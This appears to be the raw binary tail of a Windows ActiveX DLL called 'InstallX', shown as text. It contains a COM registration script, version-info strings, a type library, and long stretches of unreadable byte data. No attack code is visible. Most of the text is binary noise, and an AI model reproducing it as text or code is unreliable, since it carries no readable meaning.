		CLSID = s '{22A88341-AFCB-45F0-A856-C2BAE74F878E}'
		CurVer = s 'ActiveX.InstallX.1'
	}
	NoRemove CLSID
	{
		ForceRemove {22A88341-AFCB-45F0-A856-C2BAE74F878E} = s 'InstallX Class'
		{
			ProgID = s 'ActiveX.InstallX.1'
			VersionIndependentProgID = s 'ActiveX.InstallX'
			ForceRemove 'Programmable'
			InprocServer32 = s '%MODULE%'
			{
				val ThreadingModel = s 'Apartment'
			}
			ForceRemove 'Control'
			ForceRemove 'ToolboxBitmap32' = s '%MODULE%, 102'
			'MiscStatus' = s '0'
			{
			    '1' = s '131473'
			}
			'TypeLib' = s '{AAAC38BC-EA36-4410-9FD6-B27E7C1DE4F6}'
			'Version' = s '1.0'
		}
	}
}
       �4   V S _ V E R S I O N _ I N F O     ���               ?                         4   S t r i n g F i l e I n f o      0 4 0 9 0 4 B 0        C o m p a n y N a m e     F   F i l e D e s c r i p t i o n     A c t i v e X   M o d u l e     6   F i l e V e r s i o n     1 ,   0 ,   0 ,   1     0   I n t e r n a l N a m e   A c t i v e X   B   L e g a l C o p y r i g h t   C o p y r i g h t   2 0 0 4     @   O r i g i n a l F i l e n a m e   A c t i v e X . D L L   >   P r o d u c t N a m e     A c t i v e X   M o d u l e     :   P r o d u c t V e r s i o n   1 ,   0 ,   0 ,   1     (    O L E S e l f R e g i s t e r     D    V a r F i l e I n f o     $    T r a n s l a t i o n     	�    MSFT      	      A                                   ����       �             d   L  �   ����   L     ����   X     ����   <     ����     �   ����   �  �   ����   t     ����   t  D   ����   �  D   ����   ����    ����   ����    ����   �     ����        ����   ����    ����   ����    ����   %"  $      ����                           H                        ����                  ����4" $      ����                           �   @  ,       ,           ����              ������������x       �������������   ����������������������������������������`   ��������������������H   ������������������������   �8��6�D�ֲ~|����������c�w�|Q���  �w<���������d�w�|Q���  �w<���������A��"˯�E�Vº�O��    0   0     �      F   ����      �      F   ����L����B�_^$[(d   ����d      ��������      x   `          - stdole2.tlbWWW����������������������������������������������������������������������������������������������������������������������������������������������������    ����������������������������������������������������������������������������   ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������,   ������������
 �ACTIVEXLibWW    ����89IInstallXd   ����	8��IInstallXWWW ActiveX 1.0 Type LibraryWW InstallX Class IInstallX InterfaceWWW �SBWW � WW       ����0                       A c t i v e X                                                                                                                                                                                                                                                                                                                                       00!010Q0a0q0�0�0�0�0�0�0�0�01111 1%1+11171<1B1T1Z1�1�1�1�1�1�1�1&2t2{2�2�2�2�2^3d3x3�3�3�3�3�3�34/464F4�4�4�4�4�4�4�4�45555&5-5:5T5,6D6�6�7�7�7�7�7�7 8?8E8V8�8�8�8999�9�9�9::::#:<:B:H:~:�:�:�:�:�:�:;;T;�;&<|<�<�<�<�<�<�<�<�<�<�<�<$=>?>�>�>�>�>�>�>�>�>�>�?�?�?    �   
000G0#1-11�1�1�1�1�1�1�1�2�2�2�2�254?4J4e4y4�4�4�465R5�5�506_6�6�6�6�6�687�7�78�8�8�89c9�9�9s:�:�:!;I;S;^;n;~;�;3<G<�<�<3=:=v=�=�=�=�=$>/>[>�>??S?c?�?�?�?   0  L  =0C0O0t0�0�0�0�0�0�0�0�01)111@1J1Q1e1�1�1�1�1222(2Q2s2�2�2�2�273=3B3y3�3�3�3�3�34"4O4x4�4�4�4	5)5o5�5�5�5�5�5*616H6�6�6�67?7F7a7�7�7�7�78888-8:8@8W8r88�8�8�8�8�8�8�889B9s9�9�9�9�9�9�9�9 ::::L:R:\:a:�:�:�:�:�:�:;;N;�;<G<�<�<�<	=�=�=�=�=�=�=>>> >%>,>5>I>Z>d>n>�>�>�>�>�>�>�>�>�>�>$?5?>?N?V?f?l?r?�?�?�?�?�? @  �  000&0C0^0h0�0�0�0�0�0�0�0�0�0171E1M1T1Y1c1m1r1y1�1�1�1�1�1�1�1�1�12 2*22292@2E2S2X2_2m2r2y2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�23333!3'3?3H3^3j3q3x3�3�3�3�3�344!4/484A4I44�4�4�4�4�4�4	555G5_5d5�5�5�5�5�5�56!6&676[6�6�6�6�6�6�6�6�6�6�6�6�6$7.7v7�7�7�7�788*8=8G8Q8�8�8�8�8�8�8�899*979p99�9�9::::: :&:,:2:8:>:D:J:P:V:\:b:h:n:t:z:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:;;&;O;[;e;q;�;�;<Y<�<�<�<�<�<2=?=F=K=p=v=�=�=>>z>>9?A?G?R?_?g?u?z??�?�?�?�?�?�?�?�? P  P   0]0�0�0�0�0�0�0�0�0�0�0 111111$1*10161<1L1�12c2�2�23)3Q3a3q3�3�3 `  �   33 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3444444 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4|4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4 55555555H5L5X5d5h5x5|5�5�5�5�5 6666,60686P6d6t6x6�6�6�6�6�6�6�677$7,747<7D7X7l7x7�7�7�7�7�7�7�7�7�7�78$8,848<8D8L8X8t8|8�8�8�8�8�8�8�8�8�8�8�899 9<9H9d9l9x9�9�9�9�9�9:,:<:L:X:t:�:�: �  <   00 0$0(0,080<0@0�0�0�0D1h1l1p1t9x9|9�9�=�=�=�= >                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          